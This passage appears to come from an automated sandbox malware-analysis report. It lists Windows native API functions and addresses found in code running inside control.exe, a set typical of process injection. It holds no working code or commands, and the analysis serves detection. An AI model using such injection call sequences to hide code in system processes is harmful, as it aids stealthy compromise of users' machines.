          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F9780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046FB040 NtSuspendThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F9820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F98F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F98A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F9560 NtWriteFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F9950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F9520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046FAD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F95F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F99D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F9670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F9A20 NtResumeThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F9A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F9A10 NtQuerySection
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F9610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F9A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F9760 NtOpenProcess
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F9770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046FA770 NtOpenThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 18_2_046F9730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe